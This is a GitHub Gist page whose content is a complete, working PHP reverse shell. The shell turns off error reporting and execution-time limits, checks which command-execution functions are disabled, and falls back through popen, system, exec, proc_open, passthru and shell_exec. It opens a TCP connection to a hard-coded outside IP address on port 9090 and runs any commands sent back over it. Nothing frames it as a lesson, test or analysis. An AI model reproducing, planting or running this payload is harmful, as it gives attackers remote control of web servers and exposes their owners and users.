Last active
June 15, 2020 05:56
-
-
Save zetc0de/06f7e1c8d9c01a9fe369980b6748d4da to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*<?php /**/ | |
@error_reporting(0); | |
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0); | |
$dis=@ini_get('disable_functions'); | |
if(!empty($dis)){ | |
$dis=preg_replace('/[, ]+/', ',', $dis); | |
$dis=explode(',', $dis); | |
$dis=array_map('trim', $dis); | |
}else{ | |
$dis=array(); | |
} | |
$ipaddr='10.10.0.16'; | |
$port=9090; | |
if(!function_exists('ByZUEwJ')){ | |
function ByZUEwJ($c){ | |
global $dis; | |
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { | |
$c=$c." 2>&1\n"; | |
} | |
$KKJMFxY='is_callable'; | |
$cStJQy='in_array'; | |
if($KKJMFxY('popen')and!$cStJQy('popen',$dis)){ | |
$fp=popen($c,'r'); | |
$o=NULL; | |
if(is_resource($fp)){ | |
while(!feof($fp)){ | |
$o.=fread($fp,1024); | |
} | |
} | |
@pclose($fp); | |
}else | |
if($KKJMFxY('system')and!$cStJQy('system',$dis)){ | |
ob_start(); | |
system($c); | |
$o=ob_get_contents(); | |
ob_end_clean(); | |
}else | |
if($KKJMFxY('exec')and!$cStJQy('exec',$dis)){ | |
$o=array(); | |
exec($c,$o); | |
$o=join(chr(10),$o).chr(10); | |
}else | |
if($KKJMFxY('proc_open')and!$cStJQy('proc_open',$dis)){ | |
$handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); | |
$o=NULL; | |
while(!feof($pipes[1])){ | |
$o.=fread($pipes[1],1024); | |
} | |
@proc_close($handle); | |
}else | |
if($KKJMFxY('passthru')and!$cStJQy('passthru',$dis)){ | |
ob_start(); | |
passthru($c); | |
$o=ob_get_contents(); | |
ob_end_clean(); | |
}else | |
if($KKJMFxY('shell_exec')and!$cStJQy('shell_exec',$dis)){ | |
$o=shell_exec($c); | |
}else | |
{ | |
$o=0; | |
} | |
return $o; | |
} | |
} | |
$nofuncs='no exec functions'; | |
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ | |
$s=@fsockopen("tcp://45.77.250.67",$port); | |
while($c=fread($s,2048)){ | |
$out = ''; | |
if(substr($c,0,3) == 'cd '){ | |
chdir(substr($c,3,-1)); | |
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { | |
break; | |
}else{ | |
$out=ByZUEwJ(substr($c,0,-1)); | |
if($out===false){ | |
fwrite($s,$nofuncs); | |
break; | |
} | |
} | |
fwrite($s,$out); | |
} | |
fclose($s); | |
}else{ | |
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); | |
@socket_connect($s,$ipaddr,$port); | |
@socket_write($s,"socket_create"); | |
while($c=@socket_read($s,2048)){ | |
$out = ''; | |
if(substr($c,0,3) == 'cd '){ | |
chdir(substr($c,3,-1)); | |
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { | |
break; | |
}else{ | |
$out=ByZUEwJ(substr($c,0,-1)); | |
if($out===false){ | |
@socket_write($s,$nofuncs); | |
break; | |
} | |
} | |
@socket_write($s,$out,strlen($out)); | |
} | |
@socket_close($s); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment